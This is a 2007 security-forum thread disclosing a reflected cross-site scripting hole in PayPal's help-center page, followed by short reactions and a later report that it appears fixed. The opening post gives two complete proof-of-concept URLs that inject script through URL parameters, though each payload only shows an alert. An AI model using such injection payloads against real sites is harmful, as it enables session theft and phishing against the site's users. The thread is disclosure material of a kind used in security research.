Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 04:19PM

Before anything is said, I have reported this to PayPal, XSSed.com, and seeing how such sites as Wachovia and Banks of America are in here, and it is probably going to patched soon, I thought it proper to disclose here.

Type: Cross-Site-Scripting
Vuln: http://www.paypal.com/helpcenter/main.jsp

TAG 1:
http://www.paypal.com/helpcenter/main.jsp
?t=browseTab
&ft=browseTab
&opentopic=<img src="" onerror="javascript:alert('i pwn you!!1');">
&topicTreeId=null
&showcontent=true
&lstLanguageResults=en_US
&locale=en_US
&_dyncharset=UTF-8
&cmd=_help-ext

TAG 2:
http://www.paypal.com/helpcenter/main.jsp
?t=browseTab
&ft=browseTab
&opentopic=20009
&topicName=xss");alert('i pwn you!!2');a("&topicTreeId=null
&showcontent=true
&lstLanguageResults=en_US
&locale=en_US
&_dyncharset=UTF-8
&cmd=_help-ext



Edited 1 time(s). Last edit at 06/22/2007 05:59PM by 142TeeTH.

Options: ReplyQuote
Re: PayPal [XSS]
Posted by: ma1
Date: June 22, 2007 06:13PM

Holy Cow, I'm speechless 8|

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 06:51PM

n1!

Options: ReplyQuote
Re: PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 07:06PM

n1! ?... 1337s3x?

Options: ReplyQuote
Re: PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 07:38PM

unpack(nice(o.n.e));

Options: ReplyQuote
Re: PayPal [XSS]
Posted by: hackathology
Date: July 22, 2007 01:04AM

Seems like fixed

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.